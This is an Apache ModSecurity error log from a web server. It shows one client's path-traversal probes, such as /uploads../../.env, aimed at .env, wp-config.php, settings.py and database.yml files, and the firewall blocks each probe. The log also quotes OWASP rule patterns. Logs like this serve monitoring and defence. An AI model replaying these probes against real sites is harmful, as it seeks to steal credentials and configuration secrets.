[Tue May 12 05:10:32.982178 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.246:3318] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaKHo6NvB9WXx5V-6nRQAAAQQ"]
[Tue May 12 05:10:32.982359 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.246:3318] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaKHo6NvB9WXx5V-6nRQAAAQQ"]
[Tue May 12 05:10:32.982580 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.246:3318] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaKHo6NvB9WXx5V-6nRQAAAQQ"]
[Tue May 12 05:10:33.003046 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.246:3318] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaKXo6NvB9WXx5V-6nRgAAAQQ"]
[Tue May 12 05:10:33.003116 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.246:3318] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaKXo6NvB9WXx5V-6nRgAAAQQ"]
[Tue May 12 05:10:33.003268 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.246:3318] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaKXo6NvB9WXx5V-6nRgAAAQQ"]
[Tue May 12 05:10:33.003489 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.246:3318] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaKXo6NvB9WXx5V-6nRgAAAQQ"]
[Tue May 12 05:10:33.022933 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.246:3318] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/app/etc/env.php"] [unique_id "agKaKXo6NvB9WXx5V-6nRwAAAQQ"]
[Tue May 12 05:10:33.023119 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.246:3318] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/app/etc/env.php"] [unique_id "agKaKXo6NvB9WXx5V-6nRwAAAQQ"]
[Tue May 12 05:10:33.023328 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.246:3318] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/app/etc/env.php"] [unique_id "agKaKXo6NvB9WXx5V-6nRwAAAQQ"]
[Tue May 12 05:10:33.043018 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.246:3318] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/settings.py"] [unique_id "agKaKXo6NvB9WXx5V-6nSAAAAQQ"]
[Tue May 12 05:10:33.043208 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.246:3318] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/settings.py"] [unique_id "agKaKXo6NvB9WXx5V-6nSAAAAQQ"]
[Tue May 12 05:10:33.043420 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.246:3318] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/settings.py"] [unique_id "agKaKXo6NvB9WXx5V-6nSAAAAQQ"]
[Tue May 12 05:10:33.063906 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.246:3318] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/config/database.yml"] [unique_id "agKaKXo6NvB9WXx5V-6nSQAAAQQ"]
[Tue May 12 05:10:33.064095 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.246:3318] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/config/database.yml"] [unique_id "agKaKXo6NvB9WXx5V-6nSQAAAQQ"]
[Tue May 12 05:10:33.064300 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.246:3318] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/config/database.yml"] [unique_id "agKaKXo6NvB9WXx5V-6nSQAAAQQ"]
[Tue May 12 05:10:33.084611 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.246:3318] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKXo6NvB9WXx5V-6nSgAAAQQ"]
[Tue May 12 05:10:33.084673 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.246:3318] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKXo6NvB9WXx5V-6nSgAAAQQ"]
[Tue May 12 05:10:33.084802 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.246:3318] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKXo6NvB9WXx5V-6nSgAAAQQ"]
[Tue May 12 05:10:33.085013 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.246:3318] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKXo6NvB9WXx5V-6nSgAAAQQ"]
[Tue May 12 05:10:33.104114 2026] [core:error] [pid 1730175:tid 1730181] [client 45.148.10.246:3318] AH10244: invalid URI path (/uploads../../../.env)
[Tue May 12 05:10:33.205537 2026] [core:error] [pid 1820198:tid 1820215] [client 45.148.10.246:3334] AH10244: invalid URI path (/uploads../../../../.env)
[Tue May 12 05:10:34.732236 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.246:3336] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaKno6NvB9WXx5V-6nTAAAARE"]
[Tue May 12 05:10:34.732328 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.246:3336] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaKno6NvB9WXx5V-6nTAAAARE"]
[Tue May 12 05:10:34.732502 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.246:3336] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaKno6NvB9WXx5V-6nTAAAARE"]
[Tue May 12 05:10:34.732731 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.246:3336] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaKno6NvB9WXx5V-6nTAAAARE"]
[Tue May 12 05:10:34.750699 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.246:3336] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaKno6NvB9WXx5V-6nTQAAARE"]
[Tue May 12 05:10:34.750766 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.246:3336] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaKno6NvB9WXx5V-6nTQAAARE"]
[Tue May 12 05:10:34.750872 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.246:3336] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaKno6NvB9WXx5V-6nTQAAARE"]
[Tue May 12 05:10:34.751071 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.246:3336] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaKno6NvB9WXx5V-6nTQAAARE"]
[Tue May 12 05:10:34.770963 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.246:3336] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaKno6NvB9WXx5V-6nTgAAARE"]
[Tue May 12 05:10:34.771023 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.246:3336] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaKno6NvB9WXx5V-6nTgAAARE"]
[Tue May 12 05:10:34.771137 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.246:3336] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaKno6NvB9WXx5V-6nTgAAARE"]
[Tue May 12 05:10:34.771326 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.246:3336] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaKno6NvB9WXx5V-6nTgAAARE"]
[Tue May 12 05:10:34.790408 2026] [security2:error] [pid 1730175:tid 1730194] [client 45.148.10.246:3336] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/app/etc/env.php"] [unique_id "agKaKno6NvB9WXx5V-6nTwAAARE"]
